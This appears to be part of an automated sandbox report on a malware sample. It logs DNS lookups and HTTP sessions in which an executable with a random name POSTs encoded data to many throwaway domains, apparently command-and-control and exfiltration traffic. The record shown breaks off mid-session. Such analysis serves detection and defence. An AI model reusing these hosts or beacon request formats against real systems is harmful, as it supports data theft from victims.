                                                                                                Nov 11, 2024 17:04:31.044622898 CET6393353192.168.11.209.9.9.9
                                                                                                Nov 11, 2024 17:04:31.170887947 CET53639339.9.9.9192.168.11.20
                                                                                                Nov 11, 2024 17:04:31.413805962 CET53639331.1.1.1192.168.11.20

                                                                                                DNS Queries

                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                Nov 11, 2024 17:00:59.585478067 CET192.168.11.201.1.1.10x7359Standard query (0)www.kikaraofficial.xyzA (IP address)IN (0x0001)false
                                                                                                Nov 11, 2024 17:01:16.089739084 CET192.168.11.201.1.1.10x51ccStandard query (0)www.6686vi38.appA (IP address)IN (0x0001)false
                                                                                                Nov 11, 2024 17:01:29.555502892 CET192.168.11.201.1.1.10xe4e6Standard query (0)www.7fh27o.vipA (IP address)IN (0x0001)false
                                                                                                Nov 11, 2024 17:01:42.989825964 CET192.168.11.201.1.1.10xb5c8Standard query (0)www.redex.funA (IP address)IN (0x0001)false
                                                                                                Nov 11, 2024 17:01:57.361638069 CET192.168.11.201.1.1.10x5f81Standard query (0)www.havan-oficial.onlineA (IP address)IN (0x0001)false
                                                                                                Nov 11, 2024 17:02:10.780580044 CET192.168.11.201.1.1.10x51d5Standard query (0)www.oriony.liveA (IP address)IN (0x0001)false
                                                                                                Nov 11, 2024 17:02:25.059215069 CET192.168.11.201.1.1.10xacfStandard query (0)www.wcp95.topA (IP address)IN (0x0001)false
                                                                                                Nov 11, 2024 17:02:39.555530071 CET192.168.11.201.1.1.10xf0d5Standard query (0)www.thesquare.worldA (IP address)IN (0x0001)false
                                                                                                Nov 11, 2024 17:02:53.115077972 CET192.168.11.201.1.1.10xfe88Standard query (0)www.bocadolobopetra.netA (IP address)IN (0x0001)false
                                                                                                Nov 11, 2024 17:03:06.565753937 CET192.168.11.201.1.1.10x7250Standard query (0)www.rmzl-0.restA (IP address)IN (0x0001)false
                                                                                                Nov 11, 2024 17:03:20.062290907 CET192.168.11.201.1.1.10xb695Standard query (0)www.imgiu9.vipA (IP address)IN (0x0001)false
                                                                                                Nov 11, 2024 17:03:33.528609037 CET192.168.11.201.1.1.10x4f0eStandard query (0)www.premium303max.restA (IP address)IN (0x0001)false
                                                                                                Nov 11, 2024 17:03:47.603147030 CET192.168.11.201.1.1.10xf60fStandard query (0)www.155n8etsy.autosA (IP address)IN (0x0001)false
                                                                                                Nov 11, 2024 17:04:02.928133965 CET192.168.11.201.1.1.10xcdcfStandard query (0)www.uppercrust.clubA (IP address)IN (0x0001)false
                                                                                                Nov 11, 2024 17:04:16.393735886 CET192.168.11.201.1.1.10x71cdStandard query (0)www.ergeneescortg.xyzA (IP address)IN (0x0001)false
                                                                                                Nov 11, 2024 17:04:30.031372070 CET192.168.11.201.1.1.10x7104Standard query (0)www.06753.photoA (IP address)IN (0x0001)false
                                                                                                Nov 11, 2024 17:04:31.044622898 CET192.168.11.209.9.9.90x7104Standard query (0)www.06753.photoA (IP address)IN (0x0001)false

                                                                                                DNS Answers

                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                Nov 11, 2024 17:01:00.512243032 CET1.1.1.1192.168.11.200x7359No error (0)www.kikaraofficial.xyzredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                Nov 11, 2024 17:01:00.512243032 CET1.1.1.1192.168.11.200x7359No error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                Nov 11, 2024 17:01:00.512243032 CET1.1.1.1192.168.11.200x7359No error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                                                                                                Nov 11, 2024 17:01:16.260971069 CET1.1.1.1192.168.11.200x51ccNo error (0)www.6686vi38.app6686vi38.appCNAME (Canonical name)IN (0x0001)false
                                                                                                Nov 11, 2024 17:01:16.260971069 CET1.1.1.1192.168.11.200x51ccNo error (0)6686vi38.app3.33.130.190A (IP address)IN (0x0001)false
                                                                                                Nov 11, 2024 17:01:16.260971069 CET1.1.1.1192.168.11.200x51ccNo error (0)6686vi38.app15.197.148.33A (IP address)IN (0x0001)false
                                                                                                Nov 11, 2024 17:01:29.735591888 CET1.1.1.1192.168.11.200xe4e6No error (0)www.7fh27o.vip7fh27o.vipCNAME (Canonical name)IN (0x0001)false
                                                                                                Nov 11, 2024 17:01:29.735591888 CET1.1.1.1192.168.11.200xe4e6No error (0)7fh27o.vip3.33.130.190A (IP address)IN (0x0001)false
                                                                                                Nov 11, 2024 17:01:29.735591888 CET1.1.1.1192.168.11.200xe4e6No error (0)7fh27o.vip15.197.148.33A (IP address)IN (0x0001)false
                                                                                                Nov 11, 2024 17:01:43.499320030 CET1.1.1.1192.168.11.200xb5c8No error (0)www.redex.fun185.68.16.94A (IP address)IN (0x0001)false
                                                                                                Nov 11, 2024 17:01:57.543704033 CET1.1.1.1192.168.11.200x5f81No error (0)www.havan-oficial.online199.59.243.227A (IP address)IN (0x0001)false
                                                                                                Nov 11, 2024 17:02:10.950571060 CET1.1.1.1192.168.11.200x51d5No error (0)www.oriony.live192.64.118.221A (IP address)IN (0x0001)false
                                                                                                Nov 11, 2024 17:02:25.267754078 CET1.1.1.1192.168.11.200xacfNo error (0)www.wcp95.topwcp95.topCNAME (Canonical name)IN (0x0001)false
                                                                                                Nov 11, 2024 17:02:25.267754078 CET1.1.1.1192.168.11.200xacfNo error (0)wcp95.top154.23.184.95A (IP address)IN (0x0001)false
                                                                                                Nov 11, 2024 17:02:39.806485891 CET1.1.1.1192.168.11.200xf0d5No error (0)www.thesquare.world13.248.169.48A (IP address)IN (0x0001)false
                                                                                                Nov 11, 2024 17:02:39.806485891 CET1.1.1.1192.168.11.200xf0d5No error (0)www.thesquare.world76.223.54.146A (IP address)IN (0x0001)false
                                                                                                Nov 11, 2024 17:02:53.286621094 CET1.1.1.1192.168.11.200xfe88No error (0)www.bocadolobopetra.netbocadolobopetra.netCNAME (Canonical name)IN (0x0001)false
                                                                                                Nov 11, 2024 17:02:53.286621094 CET1.1.1.1192.168.11.200xfe88No error (0)bocadolobopetra.net3.33.130.190A (IP address)IN (0x0001)false
                                                                                                Nov 11, 2024 17:02:53.286621094 CET1.1.1.1192.168.11.200xfe88No error (0)bocadolobopetra.net15.197.148.33A (IP address)IN (0x0001)false
                                                                                                Nov 11, 2024 17:03:06.777019024 CET1.1.1.1192.168.11.200x7250No error (0)www.rmzl-0.restrmzl-0.restCNAME (Canonical name)IN (0x0001)false
                                                                                                Nov 11, 2024 17:03:06.777019024 CET1.1.1.1192.168.11.200x7250No error (0)rmzl-0.rest3.33.130.190A (IP address)IN (0x0001)false
                                                                                                Nov 11, 2024 17:03:06.777019024 CET1.1.1.1192.168.11.200x7250No error (0)rmzl-0.rest15.197.148.33A (IP address)IN (0x0001)false
                                                                                                Nov 11, 2024 17:03:20.244434118 CET1.1.1.1192.168.11.200xb695No error (0)www.imgiu9.vipimgiu9.vipCNAME (Canonical name)IN (0x0001)false
                                                                                                Nov 11, 2024 17:03:20.244434118 CET1.1.1.1192.168.11.200xb695No error (0)imgiu9.vip3.33.130.190A (IP address)IN (0x0001)false
                                                                                                Nov 11, 2024 17:03:20.244434118 CET1.1.1.1192.168.11.200xb695No error (0)imgiu9.vip15.197.148.33A (IP address)IN (0x0001)false
                                                                                                Nov 11, 2024 17:03:33.789407015 CET1.1.1.1192.168.11.200x4f0eNo error (0)www.premium303max.rest45.79.252.94A (IP address)IN (0x0001)false
                                                                                                Nov 11, 2024 17:03:47.808588028 CET1.1.1.1192.168.11.200xf60fNo error (0)www.155n8etsy.autos1.155n8etsy.autosCNAME (Canonical name)IN (0x0001)false
                                                                                                Nov 11, 2024 17:03:47.808588028 CET1.1.1.1192.168.11.200xf60fNo error (0)1.155n8etsy.autos4rk-pop.0c7t96olwyjdr.sbsCNAME (Canonical name)IN (0x0001)false
                                                                                                Nov 11, 2024 17:03:47.808588028 CET1.1.1.1192.168.11.200xf60fNo error (0)4rk-pop.0c7t96olwyjdr.sbs4rk.0c7t96olwyjdr.sbsCNAME (Canonical name)IN (0x0001)false
                                                                                                Nov 11, 2024 17:03:47.808588028 CET1.1.1.1192.168.11.200xf60fNo error (0)4rk.0c7t96olwyjdr.sbs43.156.106.109A (IP address)IN (0x0001)false
                                                                                                Nov 11, 2024 17:04:03.105787039 CET1.1.1.1192.168.11.200xcdcfNo error (0)www.uppercrust.clubuppercrust.clubCNAME (Canonical name)IN (0x0001)false
                                                                                                Nov 11, 2024 17:04:03.105787039 CET1.1.1.1192.168.11.200xcdcfNo error (0)uppercrust.club3.33.130.190A (IP address)IN (0x0001)false
                                                                                                Nov 11, 2024 17:04:03.105787039 CET1.1.1.1192.168.11.200xcdcfNo error (0)uppercrust.club15.197.148.33A (IP address)IN (0x0001)false
                                                                                                Nov 11, 2024 17:04:16.555360079 CET1.1.1.1192.168.11.200x71cdNo error (0)www.ergeneescortg.xyz104.21.56.13A (IP address)IN (0x0001)false
                                                                                                Nov 11, 2024 17:04:16.555360079 CET1.1.1.1192.168.11.200x71cdNo error (0)www.ergeneescortg.xyz172.67.175.174A (IP address)IN (0x0001)false
                                                                                                Nov 11, 2024 17:04:31.170887947 CET9.9.9.9192.168.11.200x7104Name error (3)www.06753.photononenoneA (IP address)IN (0x0001)false
                                                                                                Nov 11, 2024 17:04:31.413805962 CET1.1.1.1192.168.11.200x7104No error (0)www.06753.photouaslkd.skasdhu.huhusddfnsuegcdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                Nov 11, 2024 17:04:31.413805962 CET1.1.1.1192.168.11.200x7104No error (0)uaslkd.skasdhu.huhusddfnsuegcdn.comgtml.huksa.huhusddfnsuegcdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                Nov 11, 2024 17:04:31.413805962 CET1.1.1.1192.168.11.200x7104No error (0)gtml.huksa.huhusddfnsuegcdn.com23.167.152.41A (IP address)IN (0x0001)false

                                                                                                HTTP Request Dependency Graph

                                                                                                • www.kikaraofficial.xyz
                                                                                                • www.6686vi38.app
                                                                                                • www.7fh27o.vip
                                                                                                • www.redex.fun
                                                                                                • www.havan-oficial.online
                                                                                                • www.oriony.live
                                                                                                • www.wcp95.top
                                                                                                • www.thesquare.world
                                                                                                • www.bocadolobopetra.net
                                                                                                • www.rmzl-0.rest
                                                                                                • www.imgiu9.vip
                                                                                                • www.premium303max.rest
                                                                                                • www.155n8etsy.autos
                                                                                                • www.uppercrust.club

                                                                                                HTTP Packets

                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                0192.168.11.204974685.159.66.93807940C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:01:00.784406900 CET502OUTGET /lfgb/?IBQP=jffr1tZfViqyj73DU5WRWOY43I+aPG5WiS0/lZ85bfnIBTks24N0Lwiq54kt/mVxyQrAqrDAlkCB2A8imI95kp9/KC7Gc37tvCBE0Q7f/JyzR84blKaoE+c=&Lr3=uHMLTHRPCpsdapr HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Language: en-us
                                                                                                Host: www.kikaraofficial.xyz
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Nov 11, 2024 17:01:01.043497086 CET225INHTTP/1.1 404 Not Found
                                                                                                Server: nginx/1.14.1
                                                                                                Date: Mon, 11 Nov 2024 16:01:00 GMT
                                                                                                Content-Length: 0
                                                                                                Connection: close
                                                                                                X-Rate-Limit-Limit: 5s
                                                                                                X-Rate-Limit-Remaining: 19
                                                                                                X-Rate-Limit-Reset: 2024-11-11T16:01:05.9195744Z


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                1192.168.11.20497473.33.130.190807940C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:01:16.406161070 CET756OUTPOST /o25q/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.6686vi38.app
                                                                                                Origin: http://www.6686vi38.app
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 201
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.6686vi38.app/o25q/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Raw: 49 42 51 50 3d 64 72 37 70 34 52 2b 61 4f 46 58 6d 6f 79 46 6c 75 47 6f 71 41 6a 48 4b 78 71 73 68 4e 4d 48 71 47 64 4f 73 4f 44 69 6c 67 32 59 53 32 35 4f 72 75 39 4d 2b 67 56 74 76 47 69 6c 32 31 4a 47 63 43 5a 31 44 70 44 4a 51 70 73 49 31 49 51 46 6c 59 74 58 63 51 76 6d 6f 38 5a 6b 30 56 79 32 37 31 72 42 70 79 58 6a 57 32 6f 4d 6c 32 56 69 4e 4e 75 62 39 5a 2b 49 75 77 6c 4c 73 34 2b 47 76 30 2f 53 71 30 45 4a 75 57 71 39 37 48 66 4f 70 79 58 2f 4f 58 57 4d 6c 79 75 4a 68 30 77 78 35 4c 4e 6e 66 79 59 61 38 35 75 55 43 36 58 41 66 52 57 67 38 4f 44 43 4b 58 57 71 34 47 2f 57 42 6b 77 3d 3d
                                                                                                Data Ascii: IBQP=dr7p4R+aOFXmoyFluGoqAjHKxqshNMHqGdOsODilg2YS25Oru9M+gVtvGil21JGcCZ1DpDJQpsI1IQFlYtXcQvmo8Zk0Vy271rBpyXjW2oMl2ViNNub9Z+IuwlLs4+Gv0/Sq0EJuWq97HfOpyX/OXWMlyuJh0wx5LNnfyYa85uUC6XAfRWg8ODCKXWq4G/WBkw==


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                2192.168.11.20497483.33.130.190807940C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:01:19.075959921 CET776OUTPOST /o25q/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.6686vi38.app
                                                                                                Origin: http://www.6686vi38.app
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 221
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.6686vi38.app/o25q/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Raw: 49 42 51 50 3d 64 72 37 70 34 52 2b 61 4f 46 58 6d 71 52 64 6c 69 46 77 71 56 54 48 4a 74 36 73 68 47 73 47 6a 47 64 79 73 4f 47 53 4d 68 45 73 53 33 62 57 72 74 35 59 2b 6a 56 74 76 4f 43 6c 2f 37 70 47 48 43 59 4a 6c 70 41 52 51 70 73 63 31 49 56 35 6c 59 65 2f 64 51 2f 6d 75 78 35 6b 32 57 43 32 37 31 72 42 70 79 58 32 37 32 6f 6b 6c 32 6c 53 4e 4e 50 62 2b 46 75 49 74 78 6c 4c 73 70 4f 47 72 30 2f 53 4d 30 46 56 58 57 76 35 37 48 65 2b 70 33 53 66 50 63 57 4e 75 39 4f 49 45 78 44 31 33 4d 39 44 2b 31 4b 61 73 31 74 63 6b 79 68 4e 46 4d 6b 55 59 4e 51 65 34 54 6d 54 51 45 39 58 61 35 35 6d 78 53 63 2b 4b 71 4c 32 4e 43 72 72 4e 63 58 48 58 76 57 51 3d
                                                                                                Data Ascii: IBQP=dr7p4R+aOFXmqRdliFwqVTHJt6shGsGjGdysOGSMhEsS3bWrt5Y+jVtvOCl/7pGHCYJlpARQpsc1IV5lYe/dQ/mux5k2WC271rBpyX272okl2lSNNPb+FuItxlLspOGr0/SM0FVXWv57He+p3SfPcWNu9OIExD13M9D+1Kas1tckyhNFMkUYNQe4TmTQE9Xa55mxSc+KqL2NCrrNcXHXvWQ=


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                3192.168.11.20497493.33.130.190807940C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:01:21.729159117 CET7734OUTPOST /o25q/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.6686vi38.app
                                                                                                Origin: http://www.6686vi38.app
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 7369
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.6686vi38.app/o25q/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Raw: 49 42 51 50 3d 64 72 37 70 34 52 2b 61 4f 46 58 6d 71 52 64 6c 69 46 77 71 56 54 48 4a 74 36 73 68 47 73 47 6a 47 64 79 73 4f 47 53 4d 68 45 30 53 32 6f 65 72 74 65 6b 2b 69 56 74 76 45 69 6c 36 37 70 48 48 43 59 52 68 70 48 5a 41 70 75 6b 31 4a 7a 4e 6c 65 76 2f 64 44 66 6d 75 74 4a 6b 33 56 79 32 75 31 72 78 74 79 58 6d 37 32 6f 6b 6c 32 6d 4b 4e 4c 65 62 2b 56 65 49 75 77 6c 4c 6f 34 2b 48 4d 30 2f 4c 33 30 46 42 48 57 62 4e 37 48 2b 75 70 77 32 2f 50 56 57 4e 73 34 4f 49 6d 78 45 38 31 4d 39 50 79 31 4b 65 43 31 75 73 6b 33 46 74 54 5a 46 49 75 4f 6a 69 44 5a 47 76 54 47 76 54 49 2b 62 4b 57 43 4f 61 44 6b 4d 6d 6d 46 70 6a 51 50 30 72 42 73 69 31 42 70 47 66 69 37 77 59 52 37 58 6d 49 49 7a 75 66 32 4c 78 73 53 64 63 51 35 4e 45 63 45 45 72 6d 6d 36 2f 43 65 6f 67 78 36 45 34 71 54 4d 52 32 50 2f 6b 72 4d 2f 77 70 47 49 68 6b 6a 55 61 61 63 32 67 6f 54 78 49 79 74 67 33 39 64 2b 7a 5a 30 62 4f 6c 43 54 6a 51 6c 78 6f 59 7a 63 6a 73 77 2f 58 4f 73 36 64 5a 76 58 53 77 42 61 53 72 6c 75 4d 6a 46 [TRUNCATED]
                                                                                                Data Ascii: IBQP=dr7p4R+aOFXmqRdliFwqVTHJt6shGsGjGdysOGSMhE0S2oertek+iVtvEil67pHHCYRhpHZApuk1JzNlev/dDfmutJk3Vy2u1rxtyXm72okl2mKNLeb+VeIuwlLo4+HM0/L30FBHWbN7H+upw2/PVWNs4OImxE81M9Py1KeC1usk3FtTZFIuOjiDZGvTGvTI+bKWCOaDkMmmFpjQP0rBsi1BpGfi7wYR7XmIIzuf2LxsSdcQ5NEcEErmm6/Ceogx6E4qTMR2P/krM/wpGIhkjUaac2goTxIytg39d+zZ0bOlCTjQlxoYzcjsw/XOs6dZvXSwBaSrluMjFXCWF01Yjc/IDGRcuYpUAydceDeJpIAlSdHBc2VETQlrywDp0KLEoKjzbGIgIIMJ/gGiJCozws3iqIQp0msagDZP1J/dY4Qdy3AmpPeCRtvz9M97mWWjT6E5FSnyIMF3lU3Ejzd0OMi+SAw3I9RxjJsDaDD/rXVeUVXcWNWZiYVRLtarA6BOmGLcC6M8FGW/HWQKkMiov9L1rJ0op8Hw2ZCo/m8cY81DEz6Df8Nrm7N095ytDSt2BkhO9BUqk01MZDqC06v8zUqND0Y1reHauUh2AEBKuO6LOVicw7hBE8QcAhAr3FxqcfPyocV+EIUuN+NdMzrvtbsECI1i3vsFybyqGxds8vfVLBm2mmOAhI544GvOI8ihyE1gEMFI43DOAolKCAlsdaAlsUguPgesFXkjmZrvwnksYC7TXySGJJTat+2I0GXmefalT+z9zAIgEndnEjoO6XbUyahq3R9S8HWEHiOpDLvMZnsw9wOjVitUxf0bEz2Q2kAvBpgMLkWlt6E0EZVOCEjXP3q+1ZK/I8f1kaxkrsRH+EjHXEb2I7mQPFSpG2C0Yz7Cusuk4n6pyu2R3Gn2E8Ul63TZj2hlZCb59Z+nP3b5RIZscYcXMrDntii2DxYcSvtmfLGAoXa4y+nGWy4ZwqwHgWzGI45BxD4JVdIvzoLm4Zw [TRUNCATED]
                                                                                                Nov 11, 2024 17:01:21.729191065 CET191OUTData Raw: 73 6b 33 71 4e 63 72 48 49 41 41 4a 66 57 6e 52 78 6b 49 4c 63 55 59 61 47 48 43 55 6c 38 6c 64 52 6b 4c 4d 49 6b 54 42 68 57 77 44 74 39 66 6c 71 4a 63 4d 4e 46 67 64 43 46 6a 73 34 66 64 30 66 49 4a 30 42 75 73 42 51 55 48 48 43 30 43 41 31 5a
                                                                                                Data Ascii: sk3qNcrHIAAJfWnRxkILcUYaGHCUl8ldRkLMIkTBhWwDt9flqJcMNFgdCFjs4fd0fIJ0BusBQUHHC0CA1ZCYsqBqttbLXiI/35qUyty/wjRduqyhTPepwDy+4fh8EWMk0r5bX2smO5MXPP8jT3hPizNMU0G27xm4M5QHzdL9FBrXi4Q4fFohJnHp7AU5w==


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                4192.168.11.20497503.33.130.190807940C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:01:24.400902987 CET496OUTGET /o25q/?IBQP=QpTJ7m3GW2SBpTQ/pnZIOVyum6M1OOHCKcmmJS+2kX127Zipvsw4rzpvHWp8zcGwLINz6DxgnuQsGhwCDMmXcaGTyoRGQB215b5fyWnb/5ky0ky6NfbUSoQ=&Lr3=uHMLTHRPCpsdapr HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Language: en-us
                                                                                                Host: www.6686vi38.app
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Nov 11, 2024 17:01:24.536736012 CET400INHTTP/1.1 200 OK
                                                                                                Server: openresty
                                                                                                Date: Mon, 11 Nov 2024 16:01:24 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 260
                                                                                                Connection: close
                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 49 42 51 50 3d 51 70 54 4a 37 6d 33 47 57 32 53 42 70 54 51 2f 70 6e 5a 49 4f 56 79 75 6d 36 4d 31 4f 4f 48 43 4b 63 6d 6d 4a 53 2b 32 6b 58 31 32 37 5a 69 70 76 73 77 34 72 7a 70 76 48 57 70 38 7a 63 47 77 4c 49 4e 7a 36 44 78 67 6e 75 51 73 47 68 77 43 44 4d 6d 58 63 61 47 54 79 6f 52 47 51 42 32 31 35 62 35 66 79 57 6e 62 2f 35 6b 79 30 6b 79 36 4e 66 62 55 53 6f 51 3d 26 4c 72 33 3d 75 48 4d 4c 54 48 52 50 43 70 73 64 61 70 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?IBQP=QpTJ7m3GW2SBpTQ/pnZIOVyum6M1OOHCKcmmJS+2kX127Zipvsw4rzpvHWp8zcGwLINz6DxgnuQsGhwCDMmXcaGTyoRGQB215b5fyWnb/5ky0ky6NfbUSoQ=&Lr3=uHMLTHRPCpsdapr"}</script></head></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                5192.168.11.20497513.33.130.190807940C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:01:29.862476110 CET750OUTPOST /bpf5/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.7fh27o.vip
                                                                                                Origin: http://www.7fh27o.vip
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 201
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.7fh27o.vip/bpf5/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Raw: 49 42 51 50 3d 6b 56 6b 6b 73 54 68 38 59 7a 47 73 71 2f 49 63 33 76 32 53 4f 50 36 6b 78 62 54 2f 54 74 49 52 65 4b 48 39 4e 6b 74 33 30 41 61 42 45 70 50 52 62 6c 67 6b 6b 6d 53 47 53 6f 42 54 78 37 4a 74 6e 76 42 79 6e 42 67 7a 62 4c 6e 70 72 79 4c 65 41 6c 72 38 51 30 45 36 43 78 59 4b 6e 33 5a 6b 76 4c 2f 46 58 45 35 47 34 63 67 6f 53 71 38 65 63 75 51 72 44 41 59 6f 30 71 70 4a 58 4d 2b 2b 42 6a 31 5a 61 4e 4f 50 79 32 32 71 48 47 45 7a 36 5a 45 56 69 63 36 39 6b 35 36 53 31 37 58 71 45 57 54 4a 49 6f 71 59 48 70 70 68 46 5a 49 37 41 76 6c 7a 74 76 32 69 79 52 34 66 57 65 4f 7a 76 67 3d 3d
                                                                                                Data Ascii: IBQP=kVkksTh8YzGsq/Ic3v2SOP6kxbT/TtIReKH9Nkt30AaBEpPRblgkkmSGSoBTx7JtnvBynBgzbLnpryLeAlr8Q0E6CxYKn3ZkvL/FXE5G4cgoSq8ecuQrDAYo0qpJXM++Bj1ZaNOPy22qHGEz6ZEVic69k56S17XqEWTJIoqYHpphFZI7Avlztv2iyR4fWeOzvg==


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                6192.168.11.20497523.33.130.190807940C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:01:32.507740021 CET770OUTPOST /bpf5/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.7fh27o.vip
                                                                                                Origin: http://www.7fh27o.vip
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 221
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.7fh27o.vip/bpf5/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
